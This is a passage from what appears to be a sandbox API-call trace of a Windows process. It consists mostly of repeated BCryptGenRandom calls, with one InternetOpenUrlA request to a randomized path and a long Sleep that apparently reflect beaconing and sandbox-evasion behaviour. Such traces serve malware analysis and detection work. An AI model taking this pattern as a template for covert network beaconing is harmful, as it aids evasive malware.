(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.333] GetProcessHeap () returned 0x440000 [0246.333] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0246.333] lstrcpyA (in: lpString1=0x472b10, lpString2="pWO" | out: lpString1="pWO") returned="pWO" [0246.333] lstrcatA (in: lpString1="pWO", lpString2="/a2xmmupuc7dwyiyHx8NP7gsi4kC3fug7dfwnE5gZl/" | out: lpString1="pWO/a2xmmupuc7dwyiyHx8NP7gsi4kC3fug7dfwnE5gZl/") returned="pWO/a2xmmupuc7dwyiyHx8NP7gsi4kC3fug7dfwnE5gZl/" [0246.334] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0246.334] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="pWO/a2xmmupuc7dwyiyHx8NP7gsi4kC3fug7dfwnE5gZl/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0246.334] GetProcessHeap () returned 0x440000 [0246.334] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0246.334] GetProcessHeap () returned 0x440000 [0246.334] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5770 | out: hHeap=0x440000) returned 1 [0246.335] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0246.335] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0246.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0246.336] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0246.337] Sleep (dwMilliseconds=0x14d3f) [0246.559] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0246.559] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0246.559] GetProcessHeap () returned 0x440000 [0246.559] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02a50 [0246.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0246.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02a51, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a02a51) returned 0x0 [0246.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.562] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.562] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.562] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.562] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.562] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.563] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.563] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.563] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.563] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.564] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.564] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0246.564] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02a69, cbBuffer=0x1c, dwFlags=0x2 | out: pbBuffer=0x3a02a69) returned 0x0 [0246.565] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.565] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.565] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.565] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.565] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.566] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.566] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.566] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.567] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.567] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.567] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.567] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.567] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.568] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.568] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.568] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.569] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0246.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02a85, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a02a85) returned 0x0 [0246.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0246.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02a9c, cbBuffer=0x2b, dwFlags=0x2 | out: pbBuffer=0x3a02a9c) returned 0x0 [0246.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.688] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.688] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0246.688] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0246.688] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0246.688] BCryptGenRandom (in: 